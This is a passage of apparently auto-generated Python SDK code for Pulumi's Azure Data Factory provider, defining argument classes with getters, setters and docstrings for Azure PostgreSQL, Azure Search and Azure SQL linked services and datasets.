def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Optional[Any]:
"""
The Azure MySQL database table name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Optional[Any]):
pulumi.set(self, "table_name", value)
@pulumi.input_type
class AzurePostgreSqlLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure PostgreSQL linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'AzurePostgreSql')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzurePostgreSqlTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Azure PostgreSQL dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzurePostgreSqlTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureSearchIndexDatasetArgs:
def __init__(__self__, *,
index_name: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Azure Search Index.
:param Any index_name: The name of the Azure Search Index. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "index_name", index_name)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzureSearchIndex')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="indexName")
def index_name(self) -> Any:
"""
The name of the Azure Search Index. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "index_name")
@index_name.setter
def index_name(self, value: Any):
pulumi.set(self, "index_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureSearchLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Linked service for Windows Azure Search Service.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: URL for Azure Search service. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] key: Admin Key for Azure Search service
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'AzureSearch')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if key is not None:
pulumi.set(__self__, "key", key)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
URL for Azure Search service. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Admin Key for Azure Search service
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureSqlDWLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
tenant: Optional[Any] = None):
"""
Azure SQL Data Warehouse linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any service_principal_id: The ID of the service principal used to authenticate against Azure SQL Data Warehouse. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key of the service principal used to authenticate against Azure SQL Data Warehouse.
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'AzureSqlDW')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if tenant is not None:
pulumi.set(__self__, "tenant", tenant)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the service principal used to authenticate against Azure SQL Data Warehouse. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key of the service principal used to authenticate against Azure SQL Data Warehouse.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter
def tenant(self) -> Optional[Any]:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Optional[Any]):
pulumi.set(self, "tenant", value)
@pulumi.input_type
class AzureSqlDWTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Azure SQL Data Warehouse dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the Azure SQL Data Warehouse. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'AzureSqlDWTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the Azure SQL Data Warehouse. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureSqlDatabaseLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
tenant: Optional[Any] = None):
"""
Microsoft Azure SQL Database linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any service_principal_id: The ID of the service principal used to authenticate against Azure SQL Database. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key of the service principal used to authenticate against Azure SQL Database.
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'AzureSqlDatabase')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if tenant is not None:
pulumi.set(__self__, "tenant", tenant)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the service principal used to authenticate against Azure SQL Database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key of the service principal used to authenticate against Azure SQL Database.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter
def tenant(self) -> Optional[Any]:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Optional[Any]):
pulumi.set(self, "tenant", value)
@pulumi.input_type
class AzureSqlTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Azure SQL Server database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the Azure SQL database. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'AzureSqlTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
